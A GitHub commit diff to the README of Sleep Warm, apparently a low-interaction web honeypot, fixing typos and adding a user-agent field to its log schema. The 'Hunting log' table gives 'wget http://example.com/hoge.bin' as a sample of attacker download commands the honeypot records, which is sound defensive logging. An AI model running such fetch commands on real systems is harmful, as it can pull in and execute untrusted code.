Skip to content
This repository has been archived by the owner on Dec 27, 2023. It is now read-only.

Commit

Permalink
Merge pull request #19 from ninoseki/update-doc
Browse files Browse the repository at this point in the history 
doc: fix typos & update the log schema
  • Loading branch information
@ninoseki
ninoseki authored Oct 3, 2018
2 parents 545e241 + afbdfac commit fa01365
Showing 1 changed file with 17 additions and 18 deletions.
35 changes: 17 additions & 18 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ A web-based low-interaction honeypot build on [Rack](https://github.com/rack/rac
## Concepts

- Easy to install.
- One-click deploy to Heroku or just execute [Itamae](http://itamae.kitchen/) scripts.
- One-click deployment to Heroku or just execute [Itamae](http://itamae.kitchen/) scripts.
- Easy to customize.
- Matching rules and default responses are customizable via editing YAML files.
- Well tested.
Expand Down Expand Up @@ -48,7 +48,7 @@ $ itamae ssh -h HOST -u USER cookbooks/sleep_warm/ufw.rb

And then the honeypot works as `sleep-warm.service` on `80/tcp` and `9292/tcp`.

After the deployment, please set you Elasticsearch settings in `/opt/sleep-warm/.env` and restart the service. (By default, Sleep Warm outputs Logstash log to STDOUT.)
After the deployment, please set your Elasticsearch settings in `/opt/sleep-warm/.env` and restart the service. (By default, Sleep Warm outputs Logstash log to STDOUT.)

```
# Do not change this
Expand All @@ -63,7 +63,7 @@ LOGSTASH_TOKEN=YOUR_TOKEN

## Matching rules

Matching rules are stored in `/opt/sleep-warm/app/rules` as YAML files.
The matching rules are stored in `/opt/sleep-warm/app/rules` as YAML files.

The rule file format:

Expand All @@ -86,34 +86,33 @@ response:
body: hoge
```
The rule mataches a request which HTTP method is `GET` and request URI contains `hoge` and header contains `hoge` and body contains `hoge`.
The rule matches a request which HTTP method is `GET` and request URI contains `hoge` and header contains `hoge` and body contains `hoge`.

## Log

Sleep Warm outputs 2 types of logs.

### Access log

- Access log to the honeypot.
- Access log of the honeypot.

| key | desc. | e.g. | type |
|:-------------|:----------------------------|:----------------------------------------------------------------|:-------|
| client_ip | Client IP | `10.0.2.2` | string |
| hostname | Hostname | `localhost:9292` | string |
| method | HTTP method | `GET` | string |
| uri | Request URI | `http://localhost:9292` | string |
| http_version | HTTP version | `HTTP/1.1` | string |
| status | Status code | `200` | number |
| rule_id | Matched rule id | `1001` (if there is no matching results, it will be set as `0`) | number |
| all | Base64 encoded HTTP request | - | string |
| key | desc. | e.g. | type |
|:-------------|:----------------------------|:----------------------------------------------------------------------------------------------------------------------------|:-------|
| client_ip | Client IP | `10.0.2.2` | string |
| hostname | Hostname | `localhost:9292` | string |
| method | HTTP method | `GET` | string |
| uri | Request URI | `http://localhost:9292` | string |
| http_version | HTTP version | `HTTP/1.1` | string |
| status | Status code | `200` | number |
| rule_id | Matched rule id | `1001` (if there is no matching results, it will be set as `0`) | number |
| user_agent | User agent | `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36` | string |
| all | Base64 encoded HTTP request | - | string |

### Hunting log

- Hunting log to the honeypot.
- Hunting log of the honeypot.

| key | desc. | e.g. | type |
|:----------|:-----------------------------------------|:-----------------------------------|:-------|
| client_ip | Client IP | `10.0.2.2` | string |
| commands | Commands which try to download something | `wget http://example.com/hoge.bin` | string |


0 comments on commit fa01365

Please sign in to comment.